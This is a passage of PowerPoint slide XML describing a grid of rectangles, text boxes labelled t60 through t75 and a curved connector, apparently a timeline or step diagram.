        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697149" y="4849828"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t68</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7349810" y="4862876"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t69</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="TextBox 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8016630" y="4854020"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t70</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8669182" y="4857391"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t71</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="TextBox 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9307330" y="4858264"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t72</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="TextBox 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9962530" y="4853515"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t73</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="TextBox 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617730" y="4869179"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t74</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="TextBox 145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11265763" y="4857884"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t75</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Rectangle 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470391" y="688108"/>
            <a:ext cx="785091" cy="129215"/>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7" name="Rectangle 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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48" name="Curved Connector 147"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="140" idx="1"/>
            <a:endCxn id="147" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4461157" y="752716"/>
            <a:ext cx="9234" cy="4273752"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6140546"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>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6470037"/>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0480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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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Rectangle 83"/>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6" name="Rectangle 85"/>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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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1381173" y="166408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2036479" y="166253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91679" y="166253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Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="166253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3999010" y="166253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7" name="Rectangle 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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8" name="Rectangle 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="166253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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="166253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1" name="Rectangle 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817"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2" name="Rectangle 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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3" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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Rectangle 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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3" name="Rectangle 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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4" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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5" name="Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125"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6" name="Rectangle 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381173" y="1148398"/>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7" name="Rectangle 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036479" y="1146847"/>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8" name="Rectangle 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691679" y="1146847"/>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9" name="Rectangle 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="1146846"/>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0" name="Rectangle 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3999010" y="114684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1" name="Rectangle 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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2" name="Rectangle 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="114684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3" name="Rectangle 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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4" name="Rectangle 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="114684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5" name="Rectangle 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817"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6" name="Rectangle 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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7" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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8" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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9" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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0" name="Rectangle 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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1" name="Rectangle 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125"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2" name="Rectangle 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380537" y="476960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3" name="Rectangle 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035843" y="476805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4" name="Rectangle 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691043" y="476805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5" name="Rectangle 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346243" y="476805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6" name="Rectangle 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998374" y="476805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7" name="Rectangle 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4653574"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8" name="Rectangle 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309082" y="476805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9" name="Rectangle 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960905"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0" name="Rectangle 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6614981" y="476805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1" name="Rectangle 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270181"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2" name="Rectangle 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7923692"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3" name="Rectangle 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578042"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4" name="Rectangle 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233318"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5" name="Rectangle 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9890881"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6" name="Rectangle 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546081"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7" name="Rectangle 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11203489"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9" name="TextBox 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475982" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t60</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115363" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t61</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="TextBox 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790711" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t62</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3430409" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t63</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074681" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739232" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t65</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5406288" y="4859804"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t66</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="TextBox 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049581" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t67</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697149" y="4849828"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t68</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7349810" y="4862876"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t69</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="TextBox 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8016630" y="4854020"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t70</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8669182" y="4857391"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t71</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="TextBox 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9307330" y="4858264"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t72</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="TextBox 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9962530" y="4853515"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t73</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="TextBox 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617730" y="4869179"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t74</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="TextBox 145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11265763" y="4857884"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t75</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Rectangle 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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9" name="Rectangle 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4274673" y="2743934"/>
